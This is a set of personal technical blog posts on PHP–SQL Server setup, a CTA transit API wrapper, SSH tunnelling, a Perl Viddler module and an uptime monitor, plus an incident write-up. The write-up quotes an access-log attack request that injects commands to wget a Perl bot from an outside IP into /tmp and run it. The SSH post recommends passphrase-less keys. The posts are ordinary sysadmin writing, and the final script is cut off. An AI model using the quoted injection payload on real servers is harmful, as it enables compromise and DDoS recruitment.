Recently in Development Category

Adding SQL Server Support in PHP on Linux


Back in July I outlined a method for establishing an SSH tunnel between Linux and Windows machines. The goal of the connection was to give a PHP script on a front-end Linux web server access to information stored on a back-end private Windows server running SQL Server.

What I didn't mention at the time was how I enabled PHP support for Microsoft's SQL Server.

The most common deployments of PHP on Linux include support for MySQL or Postgres, depending largely on factors such as the organization's preference, experience and requirements. Since PHP can also be deployed on Windows, support for Microsoft's SQL Server exists as well. Such support is nontrivial to enable in PHP on Linux. It is, however, possible:

To enable SQL Server support in PHP on Linux, the PHP extension that provides said support requires the FreeTDS library to build against. FreeTDS is an open source implementation of the C libraries originally marketed by Sybase and Microsoft to enable access to their database servers.

Downloading the source code, building and installing FreeTDS is straightforward:


$ wget \
ftp://ftp.ibiblio.org/pub/Linux/ALPHA/freetds/stable/freetds-stable.tgz
$ tar xzf freetds-stable.tgz
$ cd freetds-*
$ ./configure
$ make
$ make install
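
With FreeTDS built and installed, it can also help to describe the target SQL Server in FreeTDS's configuration file. The entry below is a minimal sketch; the file location, server name, host, port and TDS version are assumptions to adjust for the actual environment (in my case the host was the local end of the SSH tunnel):


# Excerpt from freetds.conf (e.g. /usr/local/freetds/etc/freetds.conf)
[mssql-tunnel]
        host = 127.0.0.1
        port = 1433
        tds version = 8.0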

The next step is to build the PHP source code against the FreeTDS libraries to include SQL Server support. This can be done in one of two ways: build PHP from scratch, or build just the specific PHP extension. Since I was working on a server with a preexisting install of PHP, I opted for door number two:

Locate or download the source code for the preexisting version of PHP. Next, copy the mssql extension source code from the PHP source tree into a separate php_mssql directory:


$ cp ext/mssql/config.m4 ~/src/php_mssql
$ cp ext/mssql/php_mssql.c ~/src/php_mssql
$ cp ext/mssql/php_mssql.h ~/src/php_mssql

Now build the source code, pointing it to where FreeTDS has been installed:


$ cd ~/src/php_mssql
$ phpize
$ ./configure --with-mssql=/usr/local/freetds
$ make

There should now be an mssql.so file in ~/src/php_mssql/modules/ that can be copied into the existing PHP installation's extension directory. Once copied, the last remaining steps are to enable the extension by modifying the php.ini file and restarting the Apache HTTP Server.
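
The php.ini change amounts to adding an extension=mssql.so line. As a rough sketch of a first connection test once Apache has been restarted, something like the following should work; the host, port, username and password here are placeholders rather than values from an actual install, with the host pointing at the local end of the SSH tunnel:


<?php
// Connect through the local end of the SSH tunnel (placeholder credentials)
$link = mssql_connect( '127.0.0.1:1433', 'username', 'password' );

if ( !$link ) {
	die( 'Unable to connect to SQL Server' );
}

echo 'Connected to SQL Server via FreeTDS';
?>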

Additional information can be found here: Connecting PHP on Linux to MSSQL on Windows

Accessing the CTA's API with PHP


Overview
Last month the City of Chicago arranged an Open Data Hackathon, in which a collection of programmers gathered to develop programs that utilize a new resource: open access to city information.

For my part, I spent the day writing a PHP class file that wraps around the Chicago Transit Authority's web-based application programming interfaces, enabling access to CTA bus, rail and service information for PHP-driven applications. As I've noted in the README file, "this class brings all three APIs together into one object with related methods."

The following is a quick rundown of how to incorporate this new class file into a working PHP application.


Installation
The first step is to download the class.cta.php file from GitHub and save it in a location that the PHP application has read access to.

The next step is to include the file using the include (or similar require) function in the PHP application itself:

// Load the class file in our current directory
include_once( 'class.cta.php' );

Once the class file has been loaded, the next step is to instantiate the class:

$transit = new CTA ( 
	'YOUR-TRAIN-API-KEY-HERE', 
	'YOUR-BUS-API-KEY-HERE', false 
);

Notice that initialization of $transit includes providing two API keys. API keys can be requested from the CTA. For an API key for Train Tracker, use the Train Tracker API Application form. For Bus Tracker, first sign into Bus Tracker, then request a Developer Key under "My Account".1

If no valid API keys are provided, the only methods that will return valid information are the Customer Alert functions for system status information, specifically the two functions statusRoutes and statusAlerts. This is because the Customer Alerts API does not require an API key for access.
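
For example, system status can be checked with no keys at all. The snippet below is a sketch; the empty strings stand in for the unused key arguments, and the assumption is that the constructor and the two status methods are called as shown:

// No API keys; only the Customer Alerts methods will return useful data
$status = new CTA( '', '', false );

echo '<pre>';
print_r( $status->statusRoutes() );
print_r( $status->statusAlerts() );
echo '</pre>';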


Execution
To invoke a method, simply use the object and the related function, providing any additional information as parameters if required. For example, to get information about all of the stops the east-bound route 81 bus makes:

// Get an array result of all stops for an east-bound 81 bus.
$EastBoundStops = $transit->busGetStops( '81', 'East Bound' );

All methods return an array which can be accessed to retrieve desired information. PHP's print_r or var_dump functions provide insight into all information returned by a specific function:

echo '<pre>';
print_r( $transit->busGetStops( '81', 'East Bound' ));
echo '</pre>';

The output will look something akin to this:

SimpleXMLElement Object
(
    [stop] => Array
        (
            [0] => SimpleXMLElement Object
                (
                    [stpid] => 3751
                    [stpnm] => 2900 W Lawrence
                    [lat] => 41.968500785328
                    [lon] => -87.701137661934
                )
...
            [49] => SimpleXMLElement Object
                (
                    [stpid] => 3725
                    [stpnm] => Milwaukee & Higgins
                    [lat] => 41.969027266773
                    [lon] => -87.761798501015
                )

        )

)

To generate the following output, listing the location of the Lawrence & Kimball stop:

Lawrence & Kimball (Brown Line)
At 41.968405060961 North and -87.713229060173 West

The following PHP code will provide the latitude and longitude of the Kimball stop, which is also a transfer point to the El's Brown Line:

$EastBoundStops = $transit->busGetStops( '81', 'East Bound' );
foreach( $EastBoundStops as $stop ) {

     if ( preg_match( '/kimball/i', $stop->stpnm )) {
		
          echo $stop->stpnm. "\n";
          echo 'At ' .$stop->lat. ' North and ' .$stop->lon. ' West';
		
     }
	
}

Notice that while the list of stops is provided in an array, each element in the array is a SimpleXMLElement object, thus the use of the object syntax for accessing each element.

The train function will allow for the determination of rail information, for example when the next Brown line train will be leaving the Kimball stop. However, while the previous example included a stop id for the route 81 bus at Kimball, the stop id is unique to the route 81 bus and does not translate to the stop id of the Brown line El at Kimball. Therefore, the first step is to locate the relevant GTFS2 data for the Kimball station:

/*	Per the CTA's website, El routes are identified as follows:

	Red = Red Line
	Blue = Blue Line
	Brn = Brown Line
	G = Green Line
	Org = Orange Line
	P = Purple Line
	Pink = Pink Line
	Y = Yellow Line
		
	Which means our Brown line is 'brn' 
*/
$brownStops = $transit->train( '', '', '', 'brn' );
foreach( $brownStops as $stop ) {

	if ( preg_match( '/kimball/i', $stop->staNm )) {
		
		echo "$stop->staNm train is destined for $stop->stpDe ";
		echo "Scheduled to arrive/depart at $stop->arrT";
		
	}
	
}

Which provides output similar to the following:

Kimball train is destined for Service toward Loop
Scheduled to arrive/depart at 20110821 17:17:01

One should note that the Brown Line stop at Kimball is the northern end point of the Brown Line, which means any trains leaving the station will only be bound in one direction: south, toward the Loop. If the string comparison is changed to 'irving' for the Irving Park station, trains run in both directions, as shown below.
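
The only change needed is the pattern passed to preg_match inside the loop:

	if ( preg_match( '/irving/i', $stop->staNm )) {

With that change in place the output changes to something similar, with departures in both directions: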

Irving Park train is destined for Service toward Kimball
Scheduled to arrive/depart at 20110821 17:19:34

Irving Park train is destined for Service toward Kimball
Scheduled to arrive/depart at 20110821 17:23:13

Irving Park train is destined for Service toward Loop 
Scheduled to arrive/depart at 20110821 17:19:44

Irving Park train is destined for Service toward Kimball 
Scheduled to arrive/depart at 20110821 17:32:19 

In Review
class.cta.php is a single PHP class file that provides access to all three CTA APIs for Bus, Train and Service information. The class implements methods for all API calls and returns arrays of SimpleXMLElement objects that a PHP developer can use to incorporate real-time information about Chicago's public transit system.

Additional information about the CTA's APIs, including terms of use and how to request API Keys, can be found on the CTA's Developer page.




1 Why two different API keys, one for train and one for bus information? Due to the evolution of the CTA's API interfaces, there are three distinct APIs: one each for Bus, Train and Customer Alerts information. As a result there are three distinct URI endpoints and two distinct API keys.

2 The CTA provides its data based on the Google Transit Feed Specification (GTFS), which is becoming a common format for public transportation agencies to publish schedules and associated geographic information. The CTA generates and distributes, about once a week, an up-to-date zip-compressed collection of files that includes basic agency information, route, transfer and stop locations, and other related service information. Note that ids 0-29999 are bus stops, ids 30000-39999 are train stops and ids 40000-49999 are train stations (parent stops).

Establish and Maintain an SSH Tunnel between Linux and Windows


The Situation
Over the years, I've worked in numerous computing environments and have come to appreciate heterogeneous systems. In my mind, all system administrators should experience how different platforms solve similar problems, just as all programmers should be exposed to different programming languages.

Of course this means being able to play well with others. Sometimes, that's easier said than done.

A recent project requirement stipulated being able to connect a public web server with a private database system. Not an uncommon requirement, but it did place a hurdle immediately in the way. The web application, developed with the Linux, Apache, MySQL and PHP (LAMP) stack, needed a method to connect securely to the private database system, which, just for fun, was not MySQL but Microsoft's SQL Server.

The Problem
The initial requirement called for connecting to the SQL Server using Microsoft's virtual private network (VPN) solution, Microsoft Point-to-Point Encryption (MPPE). Not impossible, since support for MPPE on any Linux distribution simply requires modifying and recompiling the kernel, which is usually a non-issue.

However, in this case the web application would be running on a basic virtual private server (VPS) and a Linux VPS doesn't run its own kernel. Instead Linux VPSes run on a shared kernel used by all the different virtualized servers running on the same hardware.

Net result, no modification of the Linux kernel would be possible on the VPS.

One alternative to this hurdle would have been to switch from a Linux VPS to a Windows VPS. This would have been technically possible since Apache, MySQL and PHP have viable Windows ports. Alas, the hosting provider in question didn't yet offer Windows VPSes. They would shortly, but couldn't guarantee that their Windows VPS solution would be available in time for this particular project's deadline.

A second alternative could have been to upgrade from a virtualized server to a dedicated server. But that would have added more computing resources than what was required. From a business perspective, the added monthly cost wasn't justifiable. Not when a third alternative existed.

A Workable Solution
VPN is one of those terms that can refer to something generic as well as something very specific1. This distinction sets up alternative number three. The secure network connection requirement would remain; the implementation could simply change2.

Specifically the secure connection would be implemented via SSH instead of via MPPE.

With SSH, an encrypted tunnel can be established through an open port in the private network's firewall. This tunnel securely forwards network traffic from a specified local port to a port on the remote machine.

Most Linux distributions these days install OpenSSH as part of their base system. OpenSSH is a free and open implementation of the SSH protocol and includes both client and server software. For those distributions that don't install it by default, adding OpenSSH is usually a trivial matter via the distribution's package manager.
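
For example, on a Red Hat- or Debian-based system the client tools can usually be installed with one of the following; package names can vary by distribution and release:


# Red Hat / CentOS
yum install openssh-clients

# Debian / Ubuntu
apt-get install openssh-client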

Windows, on the other hand, has no such base installation of an SSH implementation. There are, however, a number of free software versions for Windows. For the case at hand, freeSSHD was selected to provide a free, open source version of the SSH server software.

Configuring freeSSHD to enable tunneling requires the following steps:

  1. Click on the "Tunneling" tab
  2. Check to enable port forwarding and apply the change
  3. Click on the "Users" tab
  4. Create or edit a user and enable tunnel access

Once the firewall has been configured to allow SSH traffic on port 22, establishing the tunnel from the Linux client to the Windows server is as simple as typing the following at the Linux command-line:


ssh -f -N -L 127.0.0.1:1433:192.168.1.2:1433 username@example.org

In which ssh will create and send to the background an SSH tunnel (-f option) without executing any remote commands (-N option); the tunnel begins at the localhost port 1433 (127.0.0.1:1433), terminates at the remote address and port (192.168.1.2:1433) and authenticates using the given username at the remote location (the public IP address or domain name for the private network).

But Wait There's More
There is, however, a minor problem with this SSH tunnel. As described, establishing the tunnel is an interactive process: the command needs to be executed and the user's password provided for authentication. In most cases a simple shell script executed by cron would solve this minor issue. However, for the sake of security, OpenSSH doesn't provide a command-line option for supplying passwords.

This authentication step can be managed in one of two ways. One is the use of a key management program such as ssh-agent. The second, more common option is to create a passphrase-less key.
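
For reference, the ssh-agent route looks roughly like this; the key path is an assumption and the agent only lasts for the current session:


# Start an agent for the current shell and load the private key;
# the passphrase is entered once and cached by the agent
eval $(ssh-agent)
ssh-add ~/.ssh/id_rsa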

The first step in creating a passphrase-less key is to generate a private/public key pair3. In Linux this is done by issuing the command:


ssh-keygen -t rsa

This generates a private/public key pair based on either the RSA or DSA encryption algorithm, depending on which is specified with the -t option.

When prompted to enter a passphrase for securing the private key, simply press enter. To confirm the empty passphrase, press enter again.

The next step, after copying the public key onto the Windows server, is to enable the use of the public key for authentication. In freeSSHD the steps are:

  1. Click on the "Users" tab
  2. Select a user and click on "Change"
  3. Select "Public Key" from the "Authorization" drop-down
  4. Click on "OK" to save changes to users
  5. Next click on the "Authentication" tab
  6. Using the browse button, select the directory where the users' public keys are kept
  7. Enable public-key authentication by choosing the "Allowed" button under "Public-Key Authentication"
  8. Click on "OK" to save the changes to authentication

With the passphrase-less keys in place, the last step is to automate the tunnel itself. In this case, instead of a shell script, I opted to use a program called autossh.

autossh is a program that starts a copy of ssh and monitors the connection, restarting it when necessary. The -M option tells autossh which otherwise unused local port to use for that monitoring (it also uses the port immediately above it), so our one-time startup of the tunnel looks similar to the previous example, but run through autossh with the addition of -M:


autossh -M 20000 -f -N -L 127.0.0.1:1433:192.168.1.2:1433 \
username@example.org
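
To bring the tunnel back up automatically after a reboot, one option is a cron @reboot entry along these lines; the monitoring port and the assumption that autossh is on the default path are mine, not part of the original setup:


@reboot autossh -M 20000 -f -N -L 127.0.0.1:1433:192.168.1.2:1433 username@example.org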




[1] This means, alas, it is also one of those terms that can cause confusion, especially between technical and non-technical people, if not defined at the outset.

[2] This is one of those places where knowledge of different solutions solving a similar problem becomes handy.

[3] For user authentication, SSH can be either password-based or key-based. In key-based authentication, SSH uses public-key cryptography where the public key is distributed to identify the owner of the matching private key. The passphrase in this case is used to authenticate access to the private key.

Web Development: Before and After the Client


First published: 17th of Dec 2010 for Orbit Media Studios

For someone looking for a web design firm, how a website is developed might seem meaningless. Who cares, so long as it works?

Yet how well a website works can be measured in part by the costs associated with it. The direct cost is the total price for the initial project. The indirect costs consist of secondary expenses related to ongoing marketing and support during the lifetime of the website.

At Orbit we have two development processes. Both are designed to reduce costs and improve quality. The first is an internal process that starts before the client ever arrives. The second process begins at the first client meeting as we discover the project's specific requirements.

Internal Development
First, what do we mean by develop? Development usually refers to the programming of the website, whereas design refers to the look and feel.

With development, we need to consider a few basic questions. What features are required to make an ecommerce website work, for example? Regardless of the item being sold or the company selling the item, the basic logic can be described in a few steps:

  1. A customer selects an item to purchase
  2. The selected item is placed into a shopping cart
  3. The customer decides to checkout, continue shopping or abandon their cart
  4. To checkout, the customer initiates the process of purchasing what is in their cart
  5. The store presents a total bill for the item(s) desired by the customer
  6. The customer presents a method of payment
  7. The payment is verified and the transaction is completed

To be sure, this purchasing feature isn't complete and plenty of questions can remain. However, this generalized logic provides a starting point.

This is where web development at Orbit begins, identifying basic features of a potential website.

Developer Day
Roughly once a month, all of Orbit's developers spend the day working on such questions, analyzing and programming with various sandboxes.

A sandbox is simply a generic website in which the development team can create, test and improve different features and find the best approach for virtually any type of website. It's a play area for programmers.

The focus is on breaking down the feature into workable steps and rapidly building them. In doing so we consider what has worked for clients in the past along with growing trends such as social media integration.

Each Developer Day represents the repeating of a cycle of planning, analyzing, coding and acceptance testing in order to get the feature built right.

But, as we mentioned, plenty of questions can remain. Not all features will work perfectly "out of the box" for all clients.

Developing with the Client
This brings us to the second process of web development at Orbit: developing with the client. Now the concern is on completion of a particular website. Thus the focus for the developer changes from generalized concepts to specific implementation.

But before a developer can customize the code for a client, a new process of discovery and planning must begin. The phases of this process break down into the following, with direct client involvement at each step:

  1. A Kick-Off Meeting where initial questions about goals and scope are answered
  2. Discovery of the layout and flow for the proposed website
  3. Designing the look of the website and expressing the client's brand
  4. Development, implementing and testing
  5. Deploying the website for public use

In this sequential development process each step follows from the last. There is a specific beginning and ending. One step cannot be started until the previous step is completed and approved.

The Big Payoff
Understanding the development process for a custom website is important. How many hours a developer works on a client's website and the dependability of the underlying code affect its ultimate cost.

Both direct and indirect costs impact the client's ability to market their website and can limit the overall return of the website.

Rather than starting from scratch, Orbit takes the pieces we have built and improved earlier and applies them to the client's project, customizing the features to the needs of the website. In doing so we execute different development processes in order to keep our client's costs manageable while adding value to their business.

Damn Script Kiddies, Get Off My Lawn!


This should be a post about how entertaining the Chicago edition of w00tstock was1, or about Steve Jobs' WWDC Keynote2, or about the Blackhawks winning the Stanley Cup3, or any number of other things. Instead this post is about cleaning up after some script kiddie who decided to try to use a server that does not belong to them for their own personal use.

See, on Monday last I discovered, after an automated notice of high computing load, a process identifying itself as "/usr/sbin/apache/log" which had been running for some 30+ hours. Obviously, no Apache log rotation should take that long. Moreover, the log rotation program commonly found with the Apache Web Server is known as rotatelogs. A quick directory listing confirmed that no such program or directory existed at "/usr/sbin/apache/log".

A Google search for that path resulted in a number of pages warning of a possible system compromise and suggested a review of files in the "/var/tmp" and "/tmp" directories for anything weird.

Alas, "anything weird" is a bit vague, and considering that both temporary directories are common placeholders for random files from any number of system users and programs, it took me a few passes to realize that in this case "anything weird" would be anything executable, since any proper executable would reside elsewhere on a Unix-based filesystem.

An extended listing of contents resulted in the identification of the culprit: a Perl script called pxconfig residing in the root tmp directory.

Luckily no evidence indicated a greater incursion, such as a rootkit being installed, so disabling the script was a simple matter of using root's superuser status to kill the process and strip the script file's execute permissions.

Another Google search, using some of the script's code, turned up an analysis of a similar Perl bot, the main difference being that the script I had discovered looked to have been modified with the sole purpose of working in coordination with other compromised systems to overload a server with resource requests (a DDoS) and seemed to contain no code to propagate itself.

So after disabling the offending script, I set about trying to discover how it managed to get itself installed in the first place. This blog posting suggested a possible point of entry, and indeed, after trying a couple of different search patterns on the Apache access logs, I located it:

access_log.5.gz:80.37.xxx.xx - -
[01/Jun/2009:00:01:54 -0500] "GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]
=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://81.56.xxx.xxx/cmd.gif?&cmd=cd%20/tmp;
wget%20http://81.56.xxx.xxx/d.pl;perl%20d.pl;echo%20YYY;echo| HTTP/1.1" 200 434 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Notice in the GET request a GIF file being pulled down along with a series of shell commands. The GIF file is no doubt corrupt, designed to take advantage of any number of known security vulnerabilities in the GD library, resulting in a buffer overflow that in turn allows the arbitrary execution of the commands. Those commands change to the "/tmp" directory, use wget to download a Perl file and then execute said Perl file. That file no doubt downloads yet another script named pxconfig, executes that second script and removes itself.

Moral of the story? Keep the system up-to-date, restrict all points where files can be uploaded, keep a close eye on what's running and Google is your friend.

Damn kids these days!



1 Quick Review: Very entertaining, would have liked a chance to get Bill Amend's autograph on a FoxTrot Collection.

2 Yes, I still plan on upgrading my iPhone from a "3G" to the new "4", no I'm not surprised Apple has renamed their mobile OS.

3 Time to retake my picture with The Cup.

Viddler API via Perl


Recently, while doing some consulting work, I started working with a new online video platform called Viddler. Much like YouTube, Viddler is a web application, built around video, that allows one to upload and share videos on the web.

However, unlike YouTube, Viddler also provides a great deal of features for customization, from the skinning of the video player to the integration of the Viddler platform into customized web applications. The obvious advantage here for a business or organization is the ability to provide video content wrapped within their own branding or application without the expense of building and managing the huge computing infrastructure required for bandwidth and data storage.

For example, check out MIT Tech TV, a video-sharing site for the MIT community built using Viddler.

Alas, while there is plenty of support for the Viddler Application Programming Interface via PHP, which is what my consulting work is based in, the support for Perl is quite anemic.

To help rectify this dire situation, in my free time over the last week or so I've been working on a Perl module that wraps around Viddler's API. The goal here is not only to provide a basic how-to, but a quick method for integrating Perl-based applications with Viddler. As such, I plan on having something more formal to submit, not only to Viddler's Project Directory, but to CPAN as well, in the near future.

With that in mind, here's the basic layout with a few implemented methods for guidance and testing:

package Viddler;

use strict;
use warnings;

use LWP::Simple;
use XML::Simple;

our $VERSION = "0.01";

### To Do
#
# Complete support of all API methods
# Add SSL option for methods such as users_auth
# Validation/Error Handling of parameters/results 
#
#### 

=head1 NAME

Viddler - An encapsulation of the Viddler video platform in Perl

=head1 SYNOPSIS

use Viddler;
my $videos = new Viddler( apiKey => $apiKey, 
			  username => $username,
			  password => $passwd,
			);

print "API Version: " .$videos->api_getInfo(). "\n";

=head1 DESCRIPTION

This is an object-oriented library which focuses on providing Perl 
specific methods for accessing the Viddler video service via their 
API, as documented at: 
http://developers.viddler.com/documentation/api/

=head2 Methods

=head3 new

my $video = Viddler->new( apiKey => $key, 
			  username => $username, 
			  password => $passwd );

Instantiates an object which establishes the basic connection to 
the API, including requesting and setting session id.

=cut

# The constructor of an object is called new() by convention.  
   
sub new {

	my ( $class, %args ) = @_;
	my $new = bless {
		_apiURL => 'http://api.viddler.com/rest/v1/',
		_sessionID => undef,
		_record_token => undef,
		%args
	}, $class;

	# Get a sessionid
	$new->users_auth;

	return $new;

}

=head3 users_auth

Gets and sets a sessionid for an authenticated Viddler account.
Returned sessionid is valid for 5 minutes (may change in the
future). Every method request which contains valid sessionid,
renews its validity time.

$video->users_auth;

No required parameters. Will use username and password defined
at object's creation

Additional options parameters include: 

* get_record_token: If set, the response will also include a
recordToken

Returns 0 (false) if unsuccessful and 1 (true) if successful

=cut

sub users_auth {

	my ( $self, $get_record_token ) = @_;

	# Default the optional flag to avoid an uninitialized value warning
	$get_record_token = 0 unless defined $get_record_token;

	my $xml = new XML::Simple;
	my $content = get $self->{_apiURL}. 
		"?method=viddler.users.auth&api_key="
		.$self->{apiKey}. "&user=" .$self->{username}. 
		"&password=" .$self->{password}. 
		"&get_record_token=" .$get_record_token;
	my $results = $xml->XMLin( $content );
	$self->{_sessionID} = $results->{'sessionid'};
	
	if ( defined $results->{'record_token'} ) {

		$self->{_recordToken} = $results->{'record_token'};

	}

	if ( defined ( $self->{_sessionID} )) {

		return 1;

	} else {

		return 0;

	}

}

=head3 api_getInfo

Gets and returns the current version of the Viddler API.

$video->api_getInfo;

Returns current API version as a string

=cut

sub api_getInfo {

	my ( $self ) = @_;

	my $xml = new XML::Simple;
	my $content = get $self->{_apiURL}. 
		"?method=viddler.api.getInfo&api_key=" 
		.$self->{apiKey};
	my $results = $xml->XMLin( $content );
	return $results->{'version'};

}

=head3 videos_search

Gets and returns results of a search of Viddler videos and people.

$video->videos_search( $type, $query, $page, $per_page );

Requires the following parameters:

* type: The type of search (e.g. "myvideos", 
"friendsvideos", "allvideos", "relevant", "recent", "popular",
 "timedtags", "globaltags". (The "timedtags" and "globetags"
sorting argument should be used in conjunction with an actual 
tag being given for the query argument.))

* query: What to search for (e.g. "iPhone", "Pennsylvania", or 
"Windows XP")

Additional options parameters include: 

* page: The "page number" of results to retrieve (e.g. 1, 2, 3).

* per_page: The number of results to retrieve per page (maximum 
100). If not specified, the default value equals 20.

Returns a hash of an array of search results

=cut

sub videos_search {

	my ( $self, $type, $query, $page, $per_page ) = @_;

	# Default the optional paging parameters
	$page = 1 unless defined $page;
	$per_page = 20 unless defined $per_page;

	my $xml = new XML::Simple;
	my $content = get $self->{_apiURL}. 
		"?method=viddler.videos.search&api_key=" 
		.$self->{apiKey}. "&type=" .$type. 
		"&query=" .$query. "&page=" .$page. 
		"&per_page=" .$per_page. "&sessionid=" 
		.$self->{_sessionID};
	my $results = $xml->XMLin( $content );
	return $results;

}

=head3 videos_getByUser

Gets and returns a lists of all videos that were uploaded by the 
specified user.

$video->videos_getByUser( $user, $page, $per_page, $tags, $sort );

Requires the following parameters:

* user: The chosen Viddler user name. You can provide multiple 
comma-separated Viddler usernames

Additional options parameters include: 

* page: The page of results to retrieve (e.g. 1, 2, 3).

* per_page: The number of results to retrieve per page (maximum 
100). If not specified, the default value equals 20.

* tags: The tags you would like to filter your query by.

* sort: How you would like to sort your query (views-asc, 
views-desc, uploaded-asc, uploaded-desc)

Returns a hash of an array of search results

=cut

sub videos_getByUser {

	my ( $self, $user, $page, $per_page, $tags, $sort ) = @_;

	my $xml = new XML::Simple;
	my $content = get $self->{_apiURL}. 
		"?method=viddler.videos.getByUser&api_key=" 
		.$self->{apiKey}. "&sessionid=" 
		.$self->{_sessionID}. "&user=" .$user. 
		"&page=" .$page. "&per_page=" .$per_page. 
		"&tags=" .$tags. "&sort=" .$sort;
	my $results = $xml->XMLin( $content );
	return $results;

}

=head1 AUTHOR

Paul Weinstein pdw [at] weinstein [dot] org

=cut

1;
__END__

And here's a little code to test the demo package:

#!/usr/bin/perl -T

use strict;
use warnings;

use Data::Dumper;
use Viddler;

my $videos = new Viddler( apiKey => '1234567890abcdefghij', 
			  username => 'username',
			  password => 'password',
			);

print "API Version: " .$videos->api_getInfo(). "\n";

my $searchResults = $videos->videos_getByUser( "username", 
						"", "", 
						"test", "" );
print Dumper( $searchResults );

Comments, suggestions or corrections are quite welcomed.

Google's Chrome OS in 2010


First published: 20th of November 2009 for Technorati

Yesterday Google hosted a small technical introduction to its new Chrome Operating System (OS), which is scheduled for release on new netbooks by the end of 2010.

Google's vision for Chrome OS is to build on the concept of the Web as a ubiquitous computing platform. As outlined by Sundar Pichai, Google's Vice President of Product Management, "in Chrome OS, every application is a web application." That means at the heart of everything is Google's Chrome web browser, modified to run all on its own: "It's just a browser with a few modifications. And all data in Chrome OS is in the cloud."

That in turn allows Google to provide a quick, nimble system that can "be blazingly fast, basically instant-on." As demonstrated, the test system, built on a modified Linux kernel, went from power-on to surfing the Web in 10 seconds.

In essence, Chrome OS is a cross between Google's cellphone software Android, which is also hosted on the Linux kernel, and the Chrome browser. However, unlike Android, which provides a modified Java platform for third-party applications to be built and run on, Chrome OS is built to run today's rich web applications built on AJAX as well as tomorrow's web applications built around the draft HTML5 standard.

But what does this mean for Microsoft and Apple? While Google's development of its own operating system is indeed a direct challenge to Microsoft's bread-and-butter Windows family, Chrome OS isn't a better Microsoft Windows or Apple Mac OS X. Nor is Google's OS even focused on the traditional tasks of managing the interface between the local hardware and the user.

Instead, Google's operating system is about simplifying and enhancing access to applications online. Not so much a replacement of current personal computers, but an alternative to getting online and accessing applications such as Google Docs or Twitter.

Anything that can be done in a standard web browser on Windows, Mac or Linux can be done on Chrome OS, which means Google's soon-to-be operating system is designed to leverage the growing collection of service-oriented software found online, including, of course, Google's own suite of applications.

The trick for Google now is not just in implementation, but also adoption. Building on the growing trend of netbooks helps, but network computing itself is hardly a new concept.

A Stepped Up Remote Apache Monitor in Perl


Back in September I outlined a simple Perl script to remotely monitor the status of various web servers I manage and report on any failures. One shortcoming of that script is that it has no memory of the previous state of the websites listed for polling. Thus, once a site fails, the script will continuously report on the failure until resolved.

For some, this might be just fine, a simple repetitive reminder until corrected. For others however, this might not be ideal. If, for example, the problem is non-trivial to solve, the last thing one needs is a nagging every few minutes that the issue has yet to be resolved.

I for one am all for notification without excessive nagging.

The obvious answer to this dilemma is to store the previous state of the server so that it can be tested against the current state; if the state of the server has changed, a notification gets sent. The result is one straightforward notification that something has changed.

As a bonus, by reporting on the change of state, the script will now report on when the server has come back online as well as when it has failed. This simple change eliminates what would have been a manual process previously: notifying stakeholders that the issue has been resolved.

Since the Perl script is invoked by cron on a regular basis and terminates once polling is complete, the "current" state of a site will need to be stored in secondary memory, i.e. on disk, for future comparison. This is pretty straightforward in Perl:


sub logState ($$$) {

	my ( $host, $state, $time ) = @_;

	# Create a filehandle on our log file
	my $fh = FileHandle->new(">> $fileLoc");
	if (defined $fh) {

	        # Print to file the necessary information 
                # delimited with a colon
		print $fh "$host:$state:" .$time->datetime. "\n";
		$fh->close;

 	}
}

With a new Filehandle object the script opens the file previously assigned to the $fileLoc variable for appending (the '>>' immediately prior to the variable denotes write by appending).

If a Filehandle object has been successfully created, the next step is to write a line to the file with the information necessary for the next iteration of the monitor script, specifically the host information and its current state.

Note that each line (\n) in the file will denote information about a specific site and that the related information is separated by a colon (:). This will be pertinent later in the code, when reading the log file at the next scheduled execution of the monitor script:


# Our array of polling sites' previous state
my @hostStates = ();

# Populate said array with information from log file
my $fh = FileHandle->new("< $fileLoc");
while ( <$fh> ) {

	my( $line ) = $_;
	chomp( $line );
	push ( @hostStates, $line );	

}
$fh->close;

In this bit of code the goal is to get the previously logged state of each site and populate an array with the information. At the moment how each record is delimited isn't of concern, but simply that each line is information relating to a specific site and gets its own node in the array.

Note that since the objective here is simply to read the log file, the "<" is used by the filehandle to denote that the file is opened read-only rather than for appending.
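
For reference, a record in the state file ends up looking something like this, with the hostname, last HTTP status code and timestamp separated by colons (the values are illustrative):


pdw.weinstein.org:200:2011-08-21T17:17:01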

Once the polling of a specific site occurs, the first item of concern is determining the site's previous state. For that the following bit of code is put to use:


sub getPreviousState ($) {

	my ( $host ) = @_;

	# For each node in the array do the following
	foreach ( @hostStates ) {

		my( $line ) = $_;
		# Break up the information 
                # using our delimiter, the colon
		my ($domain, $state, $time) = split(/:/, $line, 3);

		# If we find our site return the previous state 
		if ( $domain eq $host ) {
			return $state;
		}

 	}

}

In this function each element in the array is broken down into its relevant pieces using the split function, which delimits the record by a given character, the colon. From here it is a simple matter of testing the two states, the previous and the current, before rolling into the notification process.

The complete, improved remote monitor:


#!/usr/bin/perl
use strict;
use FileHandle;

use Time::Piece;
use LWP::UserAgent;
use Net::Ping;
use Net::Twitter::Lite;

### Start Global Settings ###

my $fileLoc = "/var/log/state.txt";
my @hosts = ( "pdw.weinstein.org", "www.weinstein.org" );

# Twitter credentials used by reportError; placeholder values
my $username = "twitter_username";
my $password = "twitter_password";

### End Global Settings ###

# Our array of polling sites' previous state
my @hostStates = ();

# Populate said array with information from log file
my $fh = FileHandle->new("< $fileLoc");
while ( <$fh> ) {

	my( $line ) = $_;
	chomp( $line );
	push ( @hostStates, $line );

}
$fh->close;

# Clear out the file by writing anew
my $fh = FileHandle->new("> $fileLoc");
$fh->close;

foreach my $host ( @hosts ) {

	my $previousState = getPreviousState( $host );

	my $url = "http://$host";
	my $ua = LWP::UserAgent->new;
	my $response = $ua->get( $url );

	my $currentState = $response->code;
	my $time = localtime;

	# If states are not equal we need to notify someone
	if ( $previousState ne $currentState ) {

		# Do we have a status code?
		if ( $response->code ) {

			reportError( "$host reports "
				.$response->message. "\n" );

		} else {

			# HTTP is not responding,
			# is the network connection down?
			my $p = Net::Ping->new("icmp");
			if ( $p->ping( $host, 2 )) {

				reportError( "$host is responding, 
				     but Apache is not.\n" );

			} else {

				reportError( "$host is unreachable.\n" );

			}

		}

	}

	# Not done yet, we need to log
	# the current state for future use
	logState( $host, $currentState, $time );

}

sub reportError ($) {

	my ( $msg ) = @_;
	my $nt = Net::Twitter::Lite->new(
		username => $username, 
		password => $password );

	my $result = eval { $nt->update( $msg ) };

